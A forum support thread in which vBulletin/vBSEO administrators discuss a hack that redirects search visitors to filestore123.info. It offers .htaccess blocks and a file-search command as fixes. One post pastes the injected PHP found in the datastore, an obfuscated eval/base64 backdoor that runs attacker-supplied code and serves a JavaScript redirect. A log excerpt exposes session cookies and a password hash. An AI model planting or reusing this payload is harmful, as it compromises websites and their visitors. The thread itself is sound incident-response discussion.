Google redirecting to filestore123.info

The issue has nothing to do with vBSEO and unfortunately yes you need to go through that 20+ page thread.

Sorry Mert but the 20+ page thread is useless. I have checked everything possible, I have also upgraded vbseo to the latest version and changed the config.xml permissions as recommended.

This redirect is killing off my business which is my livelihood. We need a definitive answer urgently to this problem by the vbseo support team.

An extract from one of my log files which is the result of an internal website search using google search:

121.167.56.24 www.private.com - [03/May/2011:09:41:46 +1000] "GET /menus5/goldpill5_b2.gif HTTP/1.1" 304 - "http://www.private.com/vbulletin/discussions/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbSB/5.9.1.14019)" "vbsp=1; classified_session=a657b8ebceee33e1727aa578365e706 1; vbseo_loggedin=yes; __utmc=32934908; bbsessionhash=31ea30771bd544537e53e7f56e1a3496; bbthread_lastview=a55948bbc783fd202343cb5aef393062 dec0d50ba-2-%7Bi-79840_i-1304344088_i-79823_i-1304371374_%7D; bbforum_view=86a82053ca5c144514133d30d78b2bc95ad8c 10aa-1-%7Bi-15_i-1304375121_%7D; __utma=32934908.1875368002.1302941874.1304374758.1 304379701.223; __utmz=32934908.1304374783.222.21.utmccn=(organic) |utmcsr=google|utmctr=colic|utmcmd=organic; __gads=ID=a1d24abcfcefdd39:T=1302941885:S=ALNI_MZa QJSJSIzFT358l23rlNkSY-Knsw; bblastvisit=1302944979; bblastactivity=0; bbuserid=1; bbpassword=d6a6790d9f560f04f1d1ab33880846b4; classified_session=a657b8ebceee33e1727aa578365e706 1; __utmb=32934908" 1349 164 urchindef

Could http://bsalsa.com/ be the culprit? And why would vbseo_loggedin=yes be included in this code?

vbseo_loggedin is a cookie used for analytics segmentation tracking (guests vs members). It has no other significance.

You need to lock down your writable folders.

No offense, but the support for this has been really sad here. I mean, instead of just pointing to a jumbled mess of a thread where people are trying to figure it out. How about a concise thread with all the fixings? I realize it is not vbseo's fault, but since it directly effects vbseo, and all the vbseo customers could potentially have this problem, having a concise thread would be nice.

Anyhow... Here's what I've gathered as I am also having this issue.

THE BUG...

The fact that people can upload custom avatars, custom signature pics, or custom images into the signature line. What is happening is that a PHP file, disguised as a .gif is uploaded and then run remotely. It throws base64 code into vbseo which forces a javascript redirect and cookie. The cookie means the redirect only happens once, but it is annoying, and is a drop in traffic. On a side note, more malicious code COULD be uploaded.

WHAT YOU MIGHT READ...

Many of the yahoos here want you to chmod 755 any writable directory. But what they fail to realize is that your signaturepics and customavatars directory must be 777 for people to upload. I read that far too often in that other thread.

WHAT YOU MUST DO...


STEP 1:

Is add an .htaccess file to every writable directory that someone can upload photos into.

Code:

RedirectMatch 404 .*php\.

The other code for .htaccess I've read is this one

Code:

<Files ~ "\.(php\d*|cgi|pl|phtml)$">
order allow,deny
deny from all
</Files>

Not sure which one is more correct at this point, but both should work. Most folks have been going with the second one.

Thankfully .htaccess has a recursive effect, so if you put it in the offending directories, that should solve the issue.

The directories you need to add this file to is:
customavatars
signaturepics
customprofilepics
attachments

STEP 2:

Reupload the crawlability_vbseo.xml file as a product. This will clear out the cache and fix your site immediately... As long as nothing else has been compromised.


Step 3:

I would say disallow uploads to your server. At least break it up. Have a different usergroup for premium members, or however you break it out on your site, and allow them to upload files. But keep the uploads only to them, not to the new folks and spammers.
If you're allowing uploads to the new members, you're keeping yourself open to this type of attack.

Step 4:

Remove any evil .gif files off your server

To do this, ssh to your server and run this command:

Code:

find /home/main -regex '.*\.gif$' -exec grep php {} \;

Change the /home/main to fit your main root directory. Delete the matches in those upload directories!! I usually check them first, but remove them.

Step 5:

Lastly, if you have been hacked, change your passwords. Just in case.


......................

So that's what I've gathered in a nutshell. Hopefully that will help someone out instead of just being pointed to a ton of threads, with half of them having misinformation.

Thank you so much painthappy, if only staff could take the time you took to write that out.
I do understand it's in the 300 post, 20 page thread but it's not our responsibility to sort through all that stuff when we paid for vbseo support.

ps.. b4 staff tries to flame me.. I do understand it's not directly vbseo's fault, but there are a lot of vbseo customers that are all having the same problem and it wouldn't happen if we didn't have vbseo.. so actually it is related to vbseo

Boards that don't have vBSEO installed are facing the same issue.

Again this is not an issue related with vBSEO. Our responsibility is supporting vBSEO even with that when the issue make surface we directed all our resources to the issue. When we discovered how the boards get effected we supplied directions on users how to protect their servers.

painthappy thanks for the list however that is not different from what was supplied in the 20 page thread we link to all customers.

Thats why i strongly disagree with both Brandon and painthappy that support on this issue is bad.

Originally Posted by Mert Gökçeimam

that is not different from what was supplied in the 20 page thread we link to all customers.

It's all in one thread that can be linked like this:
http://www.vbseo.com/f77/google-redi...tml#post309843

Not flippantly pointed to a 20 page thread with the hope they get the right info.

Thank you very much painthappy you are a legend! I think you should be working for vbseo.

cheers...mjs

Is it possible for someone to write a piece of .htaccess code please that stops this link(filestore123.info) from working which can be implemented at root level?

cheers...mjs

The redirection is happening on plugins so .htaccess will not stop redirection.

I've had this very same problem 2 times in the last week. I can't seem to be able to trace the origin of this in my access_log, can you guys help?

I don't seem to find any rogue php files. I found the malicious code in the pluginlist row of the datastore table. It's the following:

Code:

eval(CHR(36).CHR(120).CHR(61).CHR(39).@b33eaa5bea1a5dc4296f499c6ec75bd7.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZMYmN0b3dGUHdWbXBtT3BMRkR1QmdNY2QxTVFxQk43MDNhdmxocVJ3Z0JEbUFjWXk2SjVYL3ZpaFFtVTl2SFo3VjdMdnNndlpGek9sDQo0bktvK1hDVTFkNlNwMzVtcDN4QW9kSG5uRmlrem42d3pvamJ3ZzVGelRWR1lyZlpQa1ZKMUp4cGhEcVFyVmE4bmVObHNYZDNrV0o1UHFPRg0Kc3VlbE9aOVpZalRaWFQ2TEp6VmMyWHp5cHR0aGtyZzNoTVh4RlN6WFE2bDByVHM5OW43clBPV0xHZHhuTTBucDZ5WWhRQk1CSE9JaVdNc2INCmljaGRIUm56NzRxNkJRbENKNDRmMGdFYjUxU0Jtb3NGNEdMeWJEZ0IzS2lqUk1qellTdmEzYzZrbC9sMUxDaDhTeEN4MkxYREloek4wM2xPDQpXL2xXbEpTVjZSWVhUQ24vaVFLNTV3emUvNThNUTk0YlAvaVV1K0EvV0pqMEdsUURNZVcxcnhFZi9JUDZQeUMzQUtjY21mclBBQVljUS9nTg0KaTN4NGNaWTc1QzRaekhmR0twYXo3QXFMR0Y3K3d2UTlQRHZrUURMUzAxeDBHaDd6MmY0TDNuMy9oM2lObmVnMTF2M1Z6dDk5MURYeURmd28NClFkdE1McENwMXp4QjE2RnJBaGduN2xrYTdkSGl2eXlqUzhxWHlsTEpoR01xb0xRVzJ1SVRQbkJ3dnl5amFVVVVNNGxtMWFOdGdBZVVLRWEwDQpkR0xlSDBuQzFBVzVUQkk1V1JMMXdaZGNSelZSZFZNdm9wbkY4QmNWc2QreEZ6ZlA3VWR0Mk9QelM3ZHN2c2ZBOTVnT2dDMTh5dU1iQzZWLw0KZlVEa3J6R2dyQ2J5SjNFT0JhdHFNUHJvRnMrUjZpYmpZeU8zWTJ6R2lwMWd1ZDVFY0txeG8xRTZkRHBWRHVZL1FWbVA1Unh5Qy9iUTdYRHkNCldZM3F3akxnMnVGYzRvOTlEbXc0VUhSNjJtdVphNUJnSGo3VGF5blRrd25iWlhzNCtwMTh4bXVFcEpkWlhPNDV3U2d4dFljNHVTc2I4JykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));2I4JykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'

replied to your ticket.

I am infected as well and I too have this code in the plugin row of the datastore table. Can someone please advise on how to remove.

cheers...mjs

scroll up:
http://www.vbseo.com/f77/google-redi...tml#post309843

painthappy, Thank you very much my kind sir... you did a great job and hopefully this will help a lot of people including myself,
Its a shame that the VBSeo team indirectly refused to take any responsibility and wasn't of much help and all they did was redirect you to a 30 page long post. We understand it might not be related to VBSeo directly but it is something that most company's will help out with rather than giving a robot response, specially when so many customers are involved .its sad and a shame..

I have not yet been hacked but just implemented the goods on your .htaccess files. Hopefully that will prevent it from ever happening..

1 Question though.... I couldn't put the .htaccess file on my attachments folder since all my attachments are stored on the database, so there is no attachments folder. Do I have to move my attachments to the file system ? is my database safe enough or is there anything I should be worried about or am I all good ?